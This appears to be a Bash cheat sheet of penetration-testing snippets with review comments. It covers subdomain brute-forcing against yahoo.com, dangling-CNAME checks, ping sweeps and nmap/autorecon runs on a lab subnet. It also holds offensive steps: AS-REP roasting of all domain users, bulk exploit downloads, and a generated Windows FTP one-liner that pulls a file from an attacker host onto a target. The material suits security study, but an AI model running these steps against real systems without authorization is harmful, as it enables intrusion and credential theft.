Bash Voodoo

#Figure out whether the last command worked or not

# Exit status of the most recent command: 0 means success, anything else failure.
printf '%s\n' "$?"

#Find out whether a given domain resolves

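# 'host' exits 0 only when the name resolves. The message uses straight ASCII
# quotes; the original's curly quotes are not shell quotes and were printed
# literally as part of the output.
if host target.com; then echo "It Resolves"; fi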

#enumerate subdomains

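# Print one candidate name per line of subdomains.txt (<label>.sbtuk.net).
# read -r keeps backslashes literal; the || clause still handles a last line
# that has no trailing newline.
while read -r sub || [[ -n "$sub" ]]; do printf '%s.sbtuk.net\n' "$sub"; done < subdomains.txt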

#Create subdomains.txt separately; the file contains:
admin
test
qa
dev
www
m
blog

#Bruteforce subdomains | chmod 777 and run

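#!/bin/bash
# For every label in subdomains.txt, test whether <label>.yahoo.com resolves
# and print the names that do. The output of 'host' itself is left visible,
# as in the original.
# Make the script executable with chmod +x; world-writable 777 is not needed.
while read -r sub || [[ -n "$sub" ]]; do
  if host "$sub.yahoo.com"; then
    printf '%s\n' "$sub.yahoo.com"
  fi
done < subdomains.txt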

#Resolving CNAMES script | cnames.sh

##Use the subdomains.txt list above to find CNAME targets that no longer resolve (subdomain-takeover exposure)##

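#!/bin/bash
# cnames.sh <domain>
# Reads labels from stdin; for each <label>.<domain> that has a CNAME, checks
# whether the CNAME target still resolves and reports the ones that do not
# (a dangling CNAME). Aborts with a usage message if <domain> is missing.

domain=${1:?usage: cnames.sh <domain>  (labels on stdin)}

while read -r sub || [[ -n "$sub" ]]; do
  cname=$(host -t CNAME "$sub.$domain" | grep 'an alias' | awk '{print $NF}')
  if [[ -z "$cname" ]]; then
    continue   # no CNAME record for this name
  fi
  if ! host "$cname" &> /dev/null; then
    printf '%s did not resolve (%s)\n' "$cname" "$sub.$domain"
  fi
done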
               

#Pipe the subdomain list into cnames.sh to check yahoo.com

# cnames.sh reads labels from stdin, so redirect the file straight in.
./cnames.sh yahoo.com < subdomains.txt

#export IP variable

# Keep the target in an exported variable so later commands can reuse it.
IP=192.168.101.57
export IP
# -sC: default scripts, -sV: version detection, -oA: all output formats with basename "quick"
nmap -sC -sV -oA quick "$IP"

#Repeat the last command

!1   # history expansion: re-runs history entry number 1, not the most recent command

OR

!!   # history expansion: repeats the most recent command (interactive shells only)

#Reverse-i search

press Ctrl+R, then type dpkg to search the history for dpkg

#History tricks

# HISTCONTROL=ignoredups drops consecutive duplicate entries.
# HISTIGNORE is a colon-separated list of patterns never written to history;
# '&' stands for "same as the previous line".
HISTCONTROL=ignoredups
HISTIGNORE='&:ls:[bf]g:exit:history'
export HISTCONTROL HISTIGNORE

#Assign a command to a variable

# Capture a command's stdout in a variable, then print it.
user=$(whoami)
printf '%s\n' "$user"

#URL generator script

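#!/bin/bash
# Append every http://example/com/<city>/<digit>/<digit> combination to
# password.txt. The file is opened once for the whole loop rather than once
# per line, and printf is used so the URL text is never parsed as echo options.
# NOTE(review): the output file is named password.txt although it holds URLs;
# and "example/com" may be a typo for "example.com" — both kept as written.
cities=(tokyo beijing newyork rome bangkok osaka)
for i in "${cities[@]}"; do
  for j in {0..9}; do
    for k in {0..9}; do
      printf 'http://example/com/%s/%s/%s\n' "$i" "$j" "$k"
    done
  done
done >> password.txt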

#ping sweep script

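#!/bin/bash
# Ping every address listed in ips.txt once.
# A serial sweep waits roughly a second per host, so each ping is started in
# the background with '&' and 'wait' collects them all before the script
# exits (without it the replies keep arriving after the prompt returns).
# Note: '&' backgrounds a job, it does not daemonize it.
while read -r ip || [[ -n "$ip" ]]; do
  ping -c 1 "$ip" &
done < ips.txt
wait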

#Print out all IPs in a given subnet

# Print 10.11.1.1 … 10.11.1.10; a brace range replaces the external seq call.
for ip in {1..10}; do printf '10.11.1.%s\n' "$ip"; done

#Variation with braces instead of seq to specify a range

# Print every address 10.11.1.0 … 10.11.1.255 using a brace range.
prefix=10.11.1
for i in {0..255}; do printf '%s.%s\n' "$prefix" "$i"; done

#Same output but using a while loop instead
The -lt operator stands for "less than" (the loop below prints 1-9 and excludes 10).


#!/bin/bash
# while loop example: prints 10.11.1.1 through 10.11.1.9 and stops once
# counter reaches 10.
counter=1
while (( counter < 10 )); do
  printf '10.11.1.%d\n' "$counter"
  counter=$((counter + 1))
done

#Create a list of hosts and redirect output to a list.txt
#This command will print out all possible addresses in the lab subnet

# Print every host address 10.11.1.0 … 10.11.1.254 to stdout.
prefix=10.11.1
for i in {0..254}; do printf '%s.%s\n' "$prefix" "$i"; done


#Redirecting output to a file
# Append 10.11.1.1 … 10.11.1.10 to list.txt (file opened once for the loop).
prefix=10.11.1
for i in {1..10}; do printf '%s.%s\n' "$prefix" "$i"; done >> list.txt

#wget a given target and use grep/bash to filter for subdomains

# Fetch the front page (saved as index.html). wget itself does not need root;
# run under sudo the saved file ends up owned by root.
sudo wget -- www.megacorpone.com

#use grep "href=" to extract all the lines in index.html that contain HTML links

# Lines of index.html containing an href attribute.
grep -- 'href=' index.html

#beautify the output

# Keep links into megacorpone, drop the www host, print what follows "http://".
grep 'href=' index.html \
  | grep -F '.megacorpone' \
  | grep -Fv 'www.megacorpone.com' \
  | awk -F 'http://' '{print $2}'

#using cut to only leave subdomains

# As above, then keep only the host part (everything before the first "/").
grep 'href=' index.html \
  | grep -F '.megacorpone' \
  | grep -Fv 'www.megacorpone.com' \
  | awk -F 'http://' '{print $2}' \
  | cut -d/ -f1

#grep -o prints only the part of each line that matches the regular expression

# Extract every "<something>.megacorpone.com" (no "/" in the prefix), dedupe
# and write the sorted result to list.txt.
grep -o -- '[^/]*\.megacorpone\.com' index.html | sort -u -o list.txt

'[^/]*\.megacorpone\.com' is the pattern we are looking for: any run of characters other than "/" followed by ".megacorpone.com"

#DNS recon scripts

# Append 10.11.1.0 … 10.11.1.255 to list.txt (file opened once for the loop).
prefix=10.11.1
for i in {0..255}; do printf '%s.%s\n' "$prefix" "$i"; done >> list.txt

Then:

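# Look up every entry in list.txt, one per line. Reading with 'read -r'
# instead of word-splitting $(cat …) keeps each line intact and quotes the name
# passed to host.
while read -r url || [[ -n "$url" ]]; do host "$url"; done < list.txt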

#Parse through output grepping for available addresses

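# Same lookup loop, then keep only the resolved addresses (4th field of the
# "has address" lines), deduplicated.
while read -r url || [[ -n "$url" ]]; do host "$url"; done < list.txt \
  | grep 'has address' | cut -d ' ' -f 4 | sort -u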


#Using curl

#Similar to wget technique but with curl

# Pull host names out of the page's links: 3rd "/"-field of each href line,
# keep those mentioning cisco.com, strip the closing quote, dedupe into "test".
curl --silent https://www.cisco.com \
  | grep 'href=' \
  | cut -d/ -f3 \
  | grep 'cisco.com' \
  | cut -d'"' -f1 \
  | sort -u > test

#Beautify output
# Match "<label>.cisco.com"-shaped strings directly instead of cutting on "/".
curl --silent https://www.cisco.com \
  | grep -o -- '[A-Za-z0-9\._-]*\.*cisco\.com' \
  | sort -u

#Parsing with grep
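# Resolve each cisco.com name found in the page and print its address.
# Process substitution feeds the names line by line, so they are never
# word-split or glob-expanded, and each one is quoted when passed to host.
while read -r url; do
  host "$url" | grep 'has address' | cut -d' ' -f4
done < <(curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u)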

#Running Autorecon against an entire subnet

#Use nmap sweep to check all ports

# -A: OS/version detection, scripts and traceroute; --open: report only hosts
# with open ports; -oG: grepable output to the named file.
nmap -A --open -oG Available_nmap-scan_10.11.1.1-254 10.11.1.0/24

# Second field (the address) of every non-"Nmap" line, deduplicated.
awk '!/Nmap/ {print $2}' Available_nmap-scan_10.11.1.1-254 | sort -u
 
#Redirect output to another file  --> targets.txt 
 
 
# Same extraction as above, written to targets.txt, then hand the list to autorecon.
awk '!/Nmap/ {print $2}' Available_nmap-scan_10.11.1.1-254 | sort -u > targets.txt

autorecon targets.txt

#Workaround to use nmapAutomator against a subnet

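# One nmapAutomator run per line of targets.txt, all started in the
# background; 'wait' keeps the shell alive until the last one finishes.
# NOTE(review): every run is given the same "-o scan.txt" — confirm that
# nmapAutomator treats -o as a directory, otherwise the outputs collide.
while read -r ip || [[ -n "$ip" ]]; do
  bash /usr/local/bin/nmapAutomator.sh --host "$ip" --type Full -o scan.txt &
done < targets.txt
wait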

#Reverse lookup script

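#!/bin/bash
# Reverse lookup across a /24: prompt for the first three octets and run
# 'host -l' against .1 through .254. Input is validated as three dotted
# numbers before 254 lookups are started; read -r keeps the input literal.

echo "Please enter first 3 octets. e.g 192.168.1"
read -r subnet

three_octets='^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$'
if [[ ! "$subnet" =~ $three_octets ]]; then
  printf 'expected three dotted octets (e.g. 192.168.1), got: %s\n' "$subnet" >&2
  exit 1
fi

for ((i = 1; i <= 254; i++)); do
  host -l "$subnet.$i"
done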

#check ASREPRoast for all domain users (without credentials)

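# One GetNPUsers.py call per line of users.txt, with the banner lines filtered
# out. read -r and quoting keep each user name intact.
# NOTE(review): "domain" is presumably a placeholder for the real domain name — confirm.
while read -r user || [[ -n "$user" ]]; do
  GetNPUsers.py -no-pass -dc-ip 10.10.10.161 "domain/${user}" | grep -v Impacket
done < users.txt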

#Bash customization | edit /etc/bash.bashrc with root privileges

# /etc/bash.bashrc is the system-wide file: an alias added here applies to every
# user's interactive shell. A personal alias belongs in ~/.bashrc instead.
nano /etc/bash.bashrc

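# alias NAME=VALUE takes no spaces around "=" and the value must be a single
# quoted word — written with spaces, the original never defined the alias.
# Single quotes defer the $ip expansion to the moment the alias is used.
# NOTE(review): the "u" after -e looks like a stray token — confirm against
# gobuster's option list. gobuster itself does not need root.
alias gobustLin='sudo gobuster dir -e u --url "http://$ip/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,bak,html,txt,zip'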

#Search for a given exploit and download all matches

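#!/bin/bash
# Download every exploit that searchsploit lists for the given keywords
# (replace "redcliff debian" with your own). -w asks for exploit-db URLs and
# -t limits the search to titles; the URL's 5th "/"-separated field becomes
# the local file name and "exploits" is swapped for "raw" to fetch the source.
# --no-check-certificate was dropped: fetching code over an unverified TLS
# connection lets anyone on the path substitute the file.
while read -r url; do
  [[ -n "$url" ]] || continue
  exp_name=$(printf '%s\n' "$url" | cut -d '/' -f 5)
  raw_url=${url/exploits/raw}
  wget -q -O "$exp_name" -- "$raw_url"
done < <(searchsploit redcliff debian -w -t | grep http | cut -f 2 -d '|')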

#FTP script to spawn a one-liner for downloading

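#!/bin/bash
# Prints a one-liner to paste into a Windows host that writes an ftp script
# (ftp.txt) and runs it to download a given file from this machine.
# Prompt answers are read with -r so backslashes survive; every expansion is
# quoted; colors use ANSI-C quoting so no 'echo -e' is needed.
# Note: the printed command embeds the ftp credentials in clear text.

# Text coloring
yellow=$'\033[1;33m'
red=$'\033[1;91m'
nc=$'\033[0m'

echo
printf '%s\n' "${yellow}This gives you a one liner to paste into a Windows host to create and run a ftp script."
echo

# change tun0 to your interface if needed
ip=$(ifconfig tun0 | grep inet | cut -d" " -f10 | head -1)
if [[ -z "$ip" ]]; then
  printf '%s\n' "${red}Warning: no address read from tun0; the one-liner will have an empty host${nc}" >&2
fi
printf '%s\n' "Using IP address of tun0: $ip"
echo

printf '%s\n' "What port do you want the ftp server to run on? Hit enter for default of 21${nc}"
read -r port
ftpport=${port:-21}   # empty answer -> default port 21

echo
printf '%s\n' "${yellow}Enter the username: ${nc}"
read -r user
echo
printf '%s\n' "${yellow}Enter the password: ${nc}"
read -r pass

echo
printf '%s\n' "${yellow}What file do you want the remote host to download?${nc}"
read -r file

echo
printf '%s\n' "${yellow}Paste the below to create a ftp script and run it:${nc}"
echo
printf '%s\n' "echo open $ip $ftpport>ftp.txt&&echo $user>>ftp.txt&&echo $pass>>ftp.txt&&echo bin>>ftp.txt&&echo get $file>>ftp.txt&&echo bye>>ftp.txt&&ftp -s:ftp.txt"
echo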
